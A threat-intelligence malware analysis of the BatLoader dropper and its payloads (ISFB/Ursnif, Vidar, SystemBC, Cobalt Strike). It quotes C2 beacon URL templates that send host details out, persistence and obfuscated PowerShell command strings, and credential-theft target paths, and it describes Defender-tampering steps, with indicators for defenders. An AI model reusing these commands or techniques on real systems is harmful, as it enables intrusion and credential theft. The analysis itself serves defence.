{
	"id": "9a7c73c8-183c-4561-948a-ccaf8a496560",
	"created_at": "2026-04-06T00:18:24.180768Z",
	"updated_at": "2026-04-10T13:11:49.907279Z",
	"deleted_at": null,
	"sha1_hash": "fae8f21f020f637b2c3bbc993334632d9a4f9936",
	"title": "eSentire Threat Intelligence Malware Analysis: BatLoader",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 6520751,
	"plain_text": "eSentire Threat Intelligence Malware Analysis: BatLoader\r\nBy eSentire Threat Response Unit (TRU)\r\nArchived: 2026-04-05 20:34:42 UTC\r\nSince being introduced in February 2022, BatLoader is a malware dropper that has been observed dropping several well-known malware or malicious tools like ISFB, SystemBC RAT, Redline Stealer, and Vidar Stealer. Since its MSI installer file\r\nsize is 100MB+, BatLoader can easily evade most sandboxes and antivirus tools.\r\nThis malware analysis delves deeper into the technical details of how the BatLoader malware operates and our security\r\nrecommendations to protect your organization from being exploited.\r\nKey Takeaways\r\nBatLoader delivers additional malware and tools including ISFB, Vidar Stealer, Cobalt Strike, Syncro RMM, and\r\nSystemBC RAT via fake installers.\r\neSentire Threat Response Unit (TRU) observed two different BatLoader campaigns in 2022.\r\nBatLoader can evade most antivirus detections due to the size of the MSI installers.\r\nThe loader drops certain malware if certain conditions of the infected host are met (e.g., ARP table, domain check).\r\nThe last BatLoader campaign performs the antivirus checks and is capable of modifying Windows UAC prompt,\r\ndisabling Windows Defender notifications, disabling Task Manager, disabling command prompt, preventing users\r\nfrom accessing Windows registry tools, disabling the Run command, and modifying the display timeout.\r\neSentire TRU assesses with high confidence that BatLoader will remain active in the wild in 2023 and potentially\r\nserve as a first stage payload to deliver other malware.\r\nCase Study BatLoader\r\nIn September 2022, eSentire TRU observed multiple BatLoader infections in Consumer Services, Retail,\r\nTelecommunications, and Non-Profit client environments. The initial infection starts with the user searching for installers\r\nsuch as Zoom, TeamViewer, AnyDesk, or FileZilla. 
The user navigates to the first advertisement displayed, which redirects\r\nthe user to the website hosting the fake installer. The MSI installers are signed by “Kancelaria Adwokacka Adwokat\r\nAleksandra Krzemińska” (Figures 1-2).\r\nFigure 1: Fake Zoom Installer\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader\r\nPage 1 of 24\n\nFigure 2: Fake AnyDesk installer\r\nIn October and November 2022, we observed the second BatLoader campaign pushing fake installers such as TeamViewer\r\n(Figure 3), AnyDesk and LogMeIn. The infections were observed in Insurance, Consulting, Healthcare, and Printing\r\nindustries.\r\nFigure 3: Fake TeamViewer download page\r\nWe also observed several C2 domains related to BatLoader campaigns:\r\nupdatea1[.]com (first campaign)\r\ncloudupdatesss[.]com (first campaign)\r\nexternalchecksso[.]com (second campaign)\r\ninternalcheckssso[.]com (second campaign)\r\nBatLoader Analysis (First Campaign)\r\nBatLoader, named by Mandiant, is a malware dropper. The malware was first mentioned by Mandiant in February 2022. It’s\r\nworth noting that Mandiant mentioned the domain clouds222[.]com for the BatLoader campaign which also overlaps with\r\nthe Zloader C2 domain.\r\neSentire TRU observed BatLoader dropping the following malware / malicious tools:\r\nISFB\r\nSystemBC RAT\r\nRedline Stealer\r\nVidar Stealer\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader\r\nPage 2 of 24\n\nFigure 4: BatLoader infection chain\r\nThe MSI installer file is over 100MB in size; the large file size is implemented by threat actor(s) to evade sandboxes and\r\nantivirus products. The properties of the BatLoader MSI installer are shown in Figure 5. Within the MSI file, we have found\r\nthe components of NovaPDF 11 (Figure 6) and other garbage files shown in Figure 7. 
The files reside within the\r\nC:\\Program Files (x86)\\Softland\\novaPDF 11\\Tools path that is created after the malicious MSI is successfully run, we also\r\nfound NordVPNSetup.exe dropped within the same path. We believe that the files mentioned are used as a decoy.\r\nFigure 5: Properties of the malicious MSI installer\r\nFigure 6: NovaPDF 11 components\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader\r\nPage 3 of 24\n\nFigure 7: Decoy files\r\nThe main malicious trigger for the MSI installer resides under CustomAction table. Custom Actions are the operations\r\ndefined by the user during installation or MSI execution. The malicious actor(s) create a custom action to run the malicious\r\nPowerShell inline script. The malicious script resides under AI_DATA_SETTER action name and contains the instructions\r\nto download the malicious update.bat file from the C2 domain and place it under AppData\\Roaming folder (Figure 8). The\r\nPowerShell script is run via the PowerShell Core or pwsh.exe in a hidden window.\r\nFigure 8: Malicious PowerShell script under CustomAction Table\r\nThe downloaded update.bat file is responsible for downloading requestadmin.bat file and NirCmd.exe binary (Figure 9).\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader\r\nPage 4 of 24\n\nFigure 9: Contents of update.bat\r\nThe requestadmin.bat is responsible for performing antivirus tampering – adding %APPDATA% and %USERPROFILE%\\\r\npaths to Windows Defender exclusion to prevent Defender from scanning the mentioned paths. The batch file was executed\r\nvia nircmd.exe which was also downloaded from the C2; the utility allows the batch file to run in the background without\r\ndisplaying the user interface. 
Besides excluding the paths, the batch file also retrieves and executes the runanddelete.bat and\r\nscripttodo.ps1 scripts from the C2 via a native PowerShell command Invoke-WebRequest (Figure 10).\r\nFigure 10: The contents of requestadmin.bat\r\nThe scripttodo.ps1 installs the GnuPg, the software that encrypts and signs the data and communications as shown in Figure\r\n11.\r\nFigure 11: GnuPg installation\r\nFurther down, the script enumerates the current domain that the user is logged into, the username, and obtains all entries\r\nwithin the IPs starting with 192., 10., and .172 in the ARP cache table. Once it completes that task, it then checks the amount\r\nof IPs found in the ARP table and completes a sum operation.\r\nIf the amount is less than 2 and the user domain is within WORKGROUP, the script will not proceed to further\r\ninfection.\r\nIf the number of IPs is greater than 2, the domain is not in WORKGROUP and does not contain the username, which\r\nsatisfies all the conditions set in the script, then the full set of malware is retrieved from C2 (Figure 12).\r\nThe requests to the C2 server are performed in the following format:\r\nhttps://\u003cC2 Server\u003e/g5i0nq/index/d2ef590c0310838490561a205469713d/?servername=msi\u0026arp=\"+ $IP_count +\r\n\"\u0026domain=\" + $UserDomain + \"\u0026hostname=\" + $UserPCname\r\nhttps://\u003cC2 Server\u003e/g5i0nq/index/fa0a24aafe050500595b1df4153a17fb/?servername=msi\u0026arp=\"+ $IP_count +\r\n\"\u0026domain=\" + $UserDomain + \"\u0026hostname=\" + $UserPCname\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader\r\nPage 5 of 24\n\nhttps://\u003cC2 Server\u003e/g5i0nq/index/i850c923db452d4556a2c46125e7b6f2/?servername=msi\u0026arp=\"+ $IP_count +\r\n\"\u0026domain=\" + $UserDomain + \"\u0026hostname=\" + $UserPCname\r\nhttps://\u003cC2 Server\u003e/g5i0nq/index/b5e6ec2584da24e2401f9bc14a08dedf/?servername=msi\u0026arp=\"+ $IP_count +\r\n\"\u0026domain=\" + $UserDomain + 
\"\u0026hostname=\" + $UserPCname\r\nFigure 12: Enumerating the host and retrieving malware from C2 based on the conditions\r\nIf the mentioned conditions are not satisfied, the script retrieves the GPG-encrypted files:\r\nd2ef5.exe.gpg (encrypted Ursnif)\r\np9d2s.exe.gpg (encrypted Vidar Stealer)\r\nIf all the conditions are met, the script retrieves the following files:\r\nd2ef5.exe.gpg (encrypted Ursnif)\r\np9d2s.exe.gpg (encrypted Vidar Stealer)\r\nd655.dll.gpg (encrypted Cobalt Strike)\r\nf827.exe.gpg (encrypted Syncro RMM)\r\nshutdowni.bat\r\nWe were unable to retrieve the shutdowni.bat file but we believe the script might have been deployed to restart the host.\r\nThe GPG decryption routine was borrowed from the script hosted on GitHub (Figure 13). The script looks for files ending\r\nwith gpg in %APPDATA% folder and decrypts them using the password 105b.\r\nFigure 13: GPG decryption snippet\r\nMoreover, the scripttodo.ps1 recursively removes the implementation of Windows Defender IOfficeAntiVirus under\r\nHKLM:\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{2781761E-28E0-4109-99FE-B9D127C57AFE}. The IOfficeAntivirus\r\ncomponent is responsible for detecting malicious or suspicious files downloaded from the Internet. It then adds the\r\nextensions such as exe and DLL as exclusions to Windows Defender. Additionally, the script downloads Nsudo.exe tool to\r\nbe able to run files and programs with full privileges.\r\nWe have mentioned that besides scripttodo.ps1, the runanddelete.bat (Figure 14) file was retrieved. 
The batch file is\r\nresponsible for running a malicious executable d2ef5.exe with administrator privileges by creating a VBS script\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader\r\nPage 6 of 24\n\ngetadmin.vbs under %TEMP% folder to run the binary, but first the user would get an alert prompt from User Account\r\nControl (UAC) to allow the program to make changes.\r\nFigure 14: Contents of runanddelete.bat file\r\nThe Secrets of BatLoader\r\nThe binary d2ef5.exe is the ISFB banking malware also known as the successor of Gozi or Ursnif. The first Gozi variant was\r\nfirst discovered by SecureWorks in 2007 and is still active today, spreading through phishing emails and loaders. The Ursnif\r\nversion we observed can exfiltrate browser credentials and cookies, Thunderbird and Outlook profiles, POP3, SMTP\r\npasswords. The strings “*terminal* *wallet* *bank* *banco*” were also observed which suggests that Ursnif is also capable\r\nof stealing cryptocurrency from digital wallets and banking credentials.\r\nUpon execution, ISFB creates a persistence via Registry Run Keys under\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run. The registry value VirtualStop (the registry\r\nvalues can be different based on the wordlist table hardcoded in the binary). The registry value contains the command that\r\nlaunches the shortcut (LNK) which contains powershell.exe in the relative path. 
The PowerShell starts the\r\nCollectMirrow.ps1 script under %USERPROFILE% folder bypassing the PowerShell’s execution policy.\r\nThe command execution example:\r\ncmd /c start C:\\Users\\\u003cusername\u003e\\VirtualStop.lnk -ep unrestricted -file C:\\Users\\\u003cusername\u003e\\CollectMirrow.ps1\r\nThe CollectMirror.ps1 script contains the PowerShell one-liner (Figure 15) that pulls the written data from the registry under\r\nHKEY_CURRENT_USER\\Software\\AppDataLow\\Software\\Microsoft\\\u003cregistry_value\u003e\u003e, specifically the TestMouse value\r\n(Figure 16).\r\nFigure 15: Contents of CollectMirror.ps1\r\nFigure 16: Contents of TestMouse registry value\r\nThe script performs process injection using the API such as OpenThread (to create a handle to an existing process),\r\nVirtualAlloc (memory allocation in the chosen process), and QueueUserAPC, the thread that the APC (Asynchronous\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader\r\nPage 7 of 24\n\nProcedure Calls) is queued to has to enter an alertable state, this can be achieved by invoking SleepEx as shown in Figure\r\n17.\r\nWe have observed ISFB injecting itself into a running explorer.exe process. The unpacked sample is approximately 540 KB\r\n(MD5: 3aaf34ffbe45e4f54b37392ad1afe9a5).\r\nFigure 17: Process injection\r\nWe have observed ISFB injecting itself into a running explorer.exe process. The unpacked sample is approximately 540 KB\r\n(MD5: 3aaf34ffbe45e4f54b37392ad1afe9a5). 
You can read the very well-written analyses by Daniel Bunce here and here,\r\nbut we will cover the main basics of malware.\r\nThe payload locates the BSS section which is where the encrypted strings reside within the function shown in Figure 18 (the\r\nhex string 81 38 2E 62 73 73 contains ‘bss’).\r\nFigure 18: Payload locating the .bss section\r\nThe data stored in the BSS section is encoded as shown in Figure 19.\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader\r\nPage 8 of 24\n\nFigure 19: Snipped of the encoded data in the BSS section\r\nThe decryption function is shown below, the decryption function can be represented as the following pseudocode:\r\nFigure 20: Decryption function pseudocode\r\nThe decryption function takes 4 bytes of the encrypted data in BSS at a time and converts them into an integer, then\r\nsubtracts the key from the index value and adds to the DWORD value which is 4 bytes.\r\nThe decompiled code can be seen in Figure 21. The decryption function is thoroughly described by 0verfl0w (Daniel Bunce)\r\nhere. Part of the key is derived from the division operations from the value retrieved from API call\r\nGetSystemTimeAsFileTime (retrieving system time). Another part of the key is embedded in our payload which is\r\n0x81b8e7da. 
Applying the key to the decryption function (Figure 22) and part of the key derived from system time (which is\r\n19) gave us the decrypted data (Figure 23).\r\nFigure 21: Decompiled decryption function\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader\r\nPage 9 of 24\n\nFigure 22: Decryption function in Python\r\nFigure 23: Decrypted strings\r\nThe second decompressed data blob contains the following:\r\nC2: trackingg-protectioon.cdn1.mozilla[.]net, 45.8.158[.]104, trackingg-protectioon.cdn1.mozilla[.]net, 188.127.224[.]114,\r\nweiqeqwns[.]com, wdeiqeqwns[.]com, weiqeqwens[.]com, weiqewqwns[.]com, iujdhsndjfks[.]com\r\nBotnet ID: 10101\r\nServer ID: 50\r\nKey: T3H5l6EZGEh6GkB5\r\nDirectory: /uploaded\r\nExtension: .dib, .pct (beacon extension)\r\nSleep time: 1 second\r\nConfigTimeout (time interval to check for a new configuration): 20 seconds\r\nThe third blob contains the wordlist values shown below:\r\n['list', 'stop', 'computer', 'desktop', 'system', 'service', 'start', 'game', 'stop', 'operation', 'black', 'line', 'white', 'mode', 'link', 'urls',\r\n'text', 'name', 'document', 'type', 'folder', 'mouse', 'file', 'paper', 'mark', 'check', 'mask', 'level', 'memory', 'chip', 'time', 'reply',\r\n'date', 'mirrow', 'settings', 'collect', 'options', 'value', 'manager', 'page', 'control', 'thread', 'operator', 'byte', 'char', 'return',\r\n'device', 'driver', 'tool', 'sheet', 'util', 'book', 'class', 'window', 'handler', 'pack', 'virtual', 'test', 'active', 'collision', 'process',\r\n'make', 'local', 'core']\r\nThese words are used to build the registry value names.\r\nAnother interesting feature of the ISFB is that it stores three embedded binaries within the unpacked payload. The binaries\r\nare compressed using APLib compression algorithm. 
The decompression function is shown in Figure 24.\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader\r\nPage 10 of 24\n\nFigure 24: APLib decompression function\r\nTo be able to locate the embedded compressed binaries, we need to find the structure of the ISFB payload where it stores the\r\nconfiguration. The configuration contains the payload marker or header, XOR key, CRC32 hash, the offset, and the size of\r\neach compressed binary (Figure 25). The payload marker defines the version of ISFB.\r\nFJ – old ISFB version\r\nJ1 – old ISFB version\r\nJ2 – DreamBot version\r\nJ3 – ISFB v3 Japan\r\nJJ – ISFB v2.14 and above\r\nWD – RM3\r\nFigure 25: Header section containing the configuration\r\nThe compressed data is separated by the null bytes as shown in Figure 26. You can see something resembling C2 domains in\r\nthe first blob.\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader\r\nPage 11 of 24\n\nFigure 26: Snippet of the compressed data\r\nWe wrote a Python script to extract the compressed data and decompress them (Figure 27). The first compressed blob\r\ncontains the RSA public key with the hash 0xe1285e64 (Figure 28).\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader\r\nPage 12 of 24\n\nFigure 27: Python script to extract and decompress data blobs\r\nFigure 28: RSA public key blob\r\nISFB also stores the configuration within the function that parses the payload header (Figure 29). 
The hash values are\r\ncalculated by XORing the value 0x69b25f44 (known as g_CsCookie from the leaked code) with the values that match with\r\nCRC_CLIENT32 (again, from the leaked code).\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader\r\nPage 13 of 24\n\nFigure 29: Snippet of the configuration hashes and payload header parsing\r\nThe following are the hashes of the payload as a result of XORing:\r\n0x11271c7f – timer\r\n0x48295783 – timer\r\n0x584e5925 – botnet\r\n0x556aed8f – server\r\n0x4fa8693e – key\r\n0xd0665bf6 – domains\r\n0x54432e74– directory\r\n0xbbb5c71d – extension\r\nThe traffic beaconing contains the following pattern that will be encrypted with the AES key extracted from the compressed\r\nblob:\r\nsoft=%u\u0026version=%u\u0026user==%08x%08x%08x%08x\r\n\u0026server=50\u0026id=10101\u0026crc=61f03b3\u0026uptime=102696\u0026action=%08x\u0026dns=%s\u0026whoami=%s\u0026os=%s\r\nsoft, version – version of the payload\r\nuser – the value calculated from applying the RNG (Random Number Generator) algorithm, using the username, computer\r\nname, XOR operations, and cpuid call.\r\nserver – server ID\r\nid – botnet ID\r\nuptime – is the value based on the API calls QueryPerformanceFrequency and QueryPerformanceCounter\r\ndns – computer name\r\nos – OS version and system type\r\nThe example of the encrypted with AES-128 beacon, replacing + with _2B and / with _2F, the / are also being added:\r\n/uploaded/V1jd62QM3JcPMZGTpdjl2I/mEcoduKcJlNZo/S1Tq0KYy/M2ZEZFPG3iasm8TVeZ5oYf7/m_2FHfl318/E2HneynLJsT2KcKW6/MBeMivC1\r\nSome interesting strings found:\r\n/data.php?version=%u\u0026user=%08x%08x%08x%08x\u0026server=%u\u0026id=%u\u0026type=%u\u0026name=%s\r\n\\Software\\Microsoft\\Windows\\CurrentVersion\r\nSOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\r\n%APPDATA%\\Mozilla\\Firefox\\Profiles\r\nEnableSPDY3_0\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader\r\nPage 14 of 
24\n\n\\Macromedia\\Flash Player\\\r\ncookies.sqlite\r\ncookies.sqlite-journal\r\nMozilla\\Firefox\\Profiles\r\nMicrosoft\\Edge\\User Data\\Default\r\nGoogle\\Chrome\\User Data\\Default\r\n--use-spdy=off --disable-http2\r\nCmd %s processed: %u\r\nCmd %u parsing: %u\r\ncmd /C \"%s\u003e %s1\"\r\nwmic computersystem get domain |more\r\nsysteminfo.exe\r\ntasklist.exe /SVC \u003e\r\ndriverquery.exe \u003e\r\nreg.exe query \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\" /s \u003e\r\ncmd /U /C \"type %s1 \u003e %s \u0026 del %s1\"\r\nnet view \u003e\r\nnslookup 127.0.0.1 \u003e\r\nnslookup myip.opendns.com resolver1.opendns.com\r\nnet config workstation \u003e\r\nnltest /domain_trusts \u003e\r\nnltest /domain_trusts /all_trusts \u003e\r\nnet view /all /domain \u003e\r\nnet view /all \u003e\r\nuser_pref(\"network.http.spdy.enabled\", false);\r\nSoftware\\Microsoft\\Windows Mail\r\nSoftware\\Microsoft\\Windows Live Mail\r\naccount{*}.oeaccount\r\nAccount_Name\r\nencryptedUsername\r\nSMTP_Email_Address\r\nencryptedPassword\r\nEmailAddressCollection/EmailAddress[%u]/Address\r\nSoftware\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\\r\nSoftware\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\\r\nSoftware\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\\r\nAccount Name\r\nIMAP Server\r\nIMAP Password\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader\r\nPage 15 of 24\n\nIMAP Use SSL\r\nPOP3 Server\r\nPOP3 Password\r\nPOP3 Use SSL\r\nSMTP Server\r\nSMTP Password\r\nSMTP Use SSL\r\n%PROGRAMFILES%\\Mozilla Thunderbird\r\n%USERPROFILE%\\AppData\\Roaming\\Thunderbird\\Profiles\\*.default\r\n\\logins.json\r\n/C pause dll\r\ncache2\\entries\\*.*\r\ncmd /c start %s -ep unrestricted -file %s\r\nnew-alias -name %s -value gp;new-alias -name %s -value iex;%s ([System.Text.Encoding]::ASCII.GetString((%s\r\n\"HKCU:\\%s\").%S))\r\nipconfig 
/all\r\nfile://c:\\test\\test32.dll\r\nfile://c:\\test\\tor64.dll\r\n30, 8, *terminal* *wallet* *bank* *banco*\r\nMan-in-the-browser is another capability of Ursnif. You might have noticed strings such as\r\n“user_pref(\"network.http.spdy.enabled\", false);”, “EnableSPDY3_0” and “--use-spdy=off --disable-http2”. Ursnif disables\r\nSPDY and HTTP/2 (successor of SPDY protocol) on the infected host. The protocols allow HTTP data compression to\r\nachieve minimal latency. With the protocol implementation, threat actor(s) might have to spend additional time attempting to\r\nmodify and intercepting the web traffic.\r\nWe still see some remanences from the Ursnif DreamBot in ISFB v2 (file://c:\\test\\tor64.dll), which might suggest that the\r\nTor communication capability is still possible.\r\nVidar Stealer, SystemBC, and Syncro RMM Agent\r\nBotnet: 1259\r\nVersion: 54.7\r\nC2: t[.]me/trampapanam, nerdculture[.]de/@yoxhyp\r\nUpon successful infection, first, the host would reach out to the C2 and retrieve the DLLs (Dynamic Link Library)\r\ndependencies such as vcruntime140.dll, sqlite3.dll, softokn3.dll, nss3.dll, msvcp140.dll, mozglue.dll, freebl3.dll for the\r\nstealer to be able to extract credentials and cookies from browsers and to function properly. If you are interesting in\r\nunderstanding in more depth what each library is responsible for, you can review our blog on Mars Stealer.\r\nThe stealer then collects the credentials, host information, files, and screenshot and sends it over as a ZIP archive in a\r\nbase64-encoded format as shown in Figure 30.\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader\r\nPage 16 of 24\n\nFigure 30: Vidar exfiltrating stolen data\r\nWe are in the processing of completing a technical analysis of Vidar Stealer, which will be our next blog.\r\nSyncro RMM is a Remote Monitoring and Management tool used to control and manage devices remotely. 
In the hands of a\r\nmalicious actor, this tool can be used as a persistence mechanism and remote accessing.\r\nSystemBC RAT also known as “socks5 backconnect system” (MD5: 8ea797eb1796df20d4bdcadf0264ad6c) is a malware\r\nthat leverages SOCKS5 proxies to hide malicious traffic, it also has the capability of sending additional payloads to the hosts\r\n(Figure 31).\r\nFigure 31: Leaked SystemBC on a hacking forum\r\nThe RAT creates the mutex “wow64” with the “start” as an argument (“start” will also be used as an argument for the\r\nscheduled task command). If the mutex is not present – the RAT will reach out to the C2. The C2 configuration is shown\r\nbelow:\r\nHOST1: 188.127.224.46\r\nHOST2: hgfiudtyukjnio[.]com\r\nPORT1: 4251\r\nTOR: 0\r\nIf the mutex is present on the host, the instruction would proceed further to check the integrity level of the current malicious\r\nprocess, then it compares to the value 1000 which is SECURITY_MANDATORY_LOW_RID (low integrity level, SID: S-1-16-0), this means the process is restricted and has limited write permissions.\r\nIf the value is not equal to 1000, it proceeds with scheduled task creation, the task name is “wow64.exe”. The\r\ncommand to run the scheduled task every 2 minutes is start.\r\nIf the value is equal to 1000, the RAT proceeds to communicate with the C2 (Figure 32).\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader\r\nPage 17 of 24\n\nFigure 32: Function responsible for calling C2, task scheduling, and mutex creation\r\nSystemBC is capable of executing scripts and commands retrieved from C2 such as ps1, bat, vbs, and exe (Figure 33).\r\nFigure 33: Scripts supported by SystemBC\r\nBatLoader Analysis (Second Campaign)\r\nThe second campaign we observed is slightly different than the first one. The MSI installer (MD5:\r\n099483061f8321e70ce86c9991385f48) with the signature “Tax In Cloud sp. 
z o.o.” does not come with an embedded\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader\r\nPage 18 of 24\n\nPowerShell script. Instead, the installer pushes “avolkov.exe” binary to the infected machine and creates the registry key\r\ncontaining the path of the dropped binary which is AppData/Local/ SetupProject1 (Figure 34).\r\nFigure 34: Malicious MSI installer creating the registry key and dropping the binary file under\r\nAppData/Local/SetupProject1\r\nThe avolkov.exe binary (MD5: d41e0fee0ec6c2e3da56a6dcf53607da) utilizes libcurl 7.85.0 which enables the data transfer\r\nwith URL syntax for protocols such as HTTP/HTTPS, FTP, DICT, SMTP, IMAP, POP3, LDAP, acting as a potential\r\nbackdoor and loader. The binary has the C2 embedded inside the binary from where it retrieves the newtest.bat file (Figure\r\n35). The batch script is responsible for pulling additional BatLoader payloads and scripts from C2 such as:\r\nrequestadmin.bat\r\nnircmd.exe\r\nuser.ps1\r\ncheckav.ps1\r\nscripttodo.ps1\r\nFigure 35: Contents of newtest.bat\r\nThe requestadmin.bat (Figure 36) retrieved from the second campaign is different compared to the first campaign. 
The threat\r\nactor(s) made sure to add more paths and folders to Windows Defender exclusion including %TEMP% and C:\\Windows\\*\r\nas well as adding .ps1 (PowerShell) extension to the exclusion list.\r\nWe observed that the script retrieves NSudo and modifies Windows UAC prompt behavior by allowing administrators to\r\nperform operations without authentication or consent prompts:\r\nDisabling Windows Defender notifications,\r\nDisabling Task Manager,\r\nDisabling command prompt,\r\nPreventing users from accessing Windows registry tools,\r\nDisabling Run command,\r\nModifying the display timeout (monitor powers off after 30 minutes) and sleep mode (on AC/battery power – goes to\r\nsleep after 3000 minutes (50 hours)).\r\nThe script also no longer pulls runanddelete.bat file from the C2.\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader\r\nPage 19 of 24\n\nFigure 36: Contents of requestadmin.bat\r\nThe scripttodo.ps1 file still retrieves the same files from the C2, the Cobalt Strike payload (d655) was changed to a DLL\r\ninstead of EXE and shutdowni.bat is no longer pulled from the C2.\r\nuser.ps1 (Figure 37) is similar to scriptodo.ps1 in terms of enumerating the current domain of the host, username, and ARP\r\ntable.\r\nIf all conditions are satisfied and the host has SID S-1-5-32-544 present (Group Name: BUILTIN\\Administrators),\r\nthe script outputs “YES”.\r\nIf the conditions are not met and the host belongs to the workgroup, the script retrieves the Cobalt Strike payload\r\nnamed installv2.dll (MD5: 4a6898a4584fdfb34bbeefc77bc882c4) and runs it via rundll32.exe with an ordinal\r\n“SRANdomsrt”.\r\nInterestingly enough, we have observed QakBot using the same ordinal name to run Cobalt Strike payloads.\r\nFigure 37: Contents of the user.ps1\r\nAnother new addition to BatLoader is the antivirus check script (checkav.ps1). 
The script checks the host against the list of\r\nantiviruses and sends it out to C2 server (Figure 38).\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader\r\nPage 20 of 24\n\nFigure 38: Contents of checkav.ps1\r\nLater, threat actor(s) switched from externalchecksso[.]com to internalchecksso[.]com. The scripttodo.ps1 was also changed\r\nto ru.ps1 as well as the names for malicious binaries as shown in Figure 39.\r\nFigure 39: Contents of ru.ps1\r\nHow eSentire is Responding\r\nOur Threat Response Unit (TRU) combines threat intelligence obtained from continuous research and security incidents to\r\ncreate practical outcomes for our customers. We are taking a full-scale response approach to ongoing cybersecurity threats\r\nby deploying countermeasures, such as:\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader\r\nPage 21 of 24\n\nImplementing threat detections and leveraging BlueSteel, our machine-learning powered PowerShell classifier, to\r\nidentify malicious command execution and ensuring that eSentire has visibility and detections are in place across\r\neSentire MDR for Endpoint and MDR for Network.\r\nPerforming global threat hunts for indicators associated with BatLoader.\r\nOur detection content is supported by investigation runbooks, ensuring our 24/7 SOC Cyber Analysts respond rapidly to any\r\nintrusion attempts related to known malware Tactics, Techniques, and Procedures. 
In addition, TRU closely monitors the\r\nthreat landscape and constantly addresses capability gaps and conducts retroactive threat hunts to assess customer impact.\r\nRecommendations from eSentire's Threat Response Unit (TRU)\r\nWe recommend implementing the following controls to help secure your organization against BatLoader malware:\r\nConfirm that all devices are protected with Endpoint Detection and Response (EDR) solutions\r\nEncouraging good cybersecurity hygiene among your users by using Phishing and Security Awareness Training\r\n(PSAT) when downloading software from the Internet.\r\nEncourage your employees to use password managers instead of using the password storage feature provided by web\r\nbrowsers.\r\nWhile the TTPs used by adversaries grow in sophistication, they lead to a certain level of difficulties at which critical\r\nbusiness decisions must be made. Preventing the various attack paths utilized by the modern threat actor requires actively\r\nmonitoring the threat landscape, developing, and deploying endpoint detection, and the ability to investigate logs \u0026 network\r\ndata during active intrusions.\r\neSentire’s TRU is a world-class team of threat researchers who develop new detections enriched by original threat\r\nintelligence and leverage new machine learning models that correlate multi-signal data and automate rapid response to\r\nadvanced threats.\r\nIf you are not currently engaged with an MDR provider, eSentire MDR can help you reclaim the advantage and put your\r\nbusiness ahead of disruption.\r\nLearn what it means to have an elite team of Threat Hunters and Researchers that works for you. 
Connect with an eSentire\r\nSecurity Specialist.\r\nAppendix\r\nhttps://www.mandiant.com/resources/blog/seo-poisoning-batloader-atera\r\nhttps://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/\r\nhttps://raw.githubusercontent.com/adbertram/Random-PowerShell-Work/master/Security/GnuPg.psm1\r\nhttps://learn.microsoft.com/en-us/windows/win32/sync/asynchronous-procedure-calls?redirectedfrom=MSDN\r\nhttps://www.0ffset.net/reverse-engineering/malware-analysis/analysing-isfb-loader/\r\nhttps://www.0ffset.net/reverse-engineering/malware-analysis/analyzing-isfb-second-loader/\r\nhttps://www.0ffset.net/reverse-engineering/challenge-1-gozi-string-crypto/\r\nhttps://research.openanalysis.net/config/python/yara/isfb/rm3/gozi/2022/10/06/isfb.html\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-mars-stealer\r\nhttps://owasp.org/www-community/attacks/Man-in-the-browser_attack\r\nIndicators of Compromise\r\nName | Indicator\r\nBatLoader C2 | updatea1[.]com\r\nBatLoader C2 | externalchecksso[.]com\r\nBatLoader C2 | internalcheckssso[.]com\r\nUrsnif C2 | weiqeqwns[.]com\r\nUrsnif C2 | wdeiqeqwns[.]com\r\nUrsnif C2 | weiqeqwens[.]com\r\nUrsnif C2 | weiqewqwns[.]com\r\nUrsnif C2 | iujdhsndjfks[.]com\r\nUrsnif C2 | trackingg-protectioon.cdn1.mozilla[.]net\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader\r\nPage 22 of 24\n\nUrsnif C2 | 45.8.158[.]104\r\nUrsnif C2 | 188.127.224[.]114\r\nUrsnif C2 | siwdmfkshsgw[.]com\r\nVidar Stealer | t[.]me/trampapanam\r\nUrsnif C2 | Ijduwhsbvk[.]com\r\nVidar Stealer | nerdculture[.]de/@yoxhyp\r\nSystemBC C2 | hgfiudtyukjnio[.]com\r\nSystemBC C2 (overlaps with Ursnif C2 ISP) | 188.127.224[.]46\r\nCobalt Strike C2 | 139.60.161[.]74\r\nRedline C2 | 176.113.115[.]10\r\nMITRE ATT\u0026CK\r\nMITRE ATT\u0026CK Tactic | ID | MITRE ATT\u0026CK Technique | 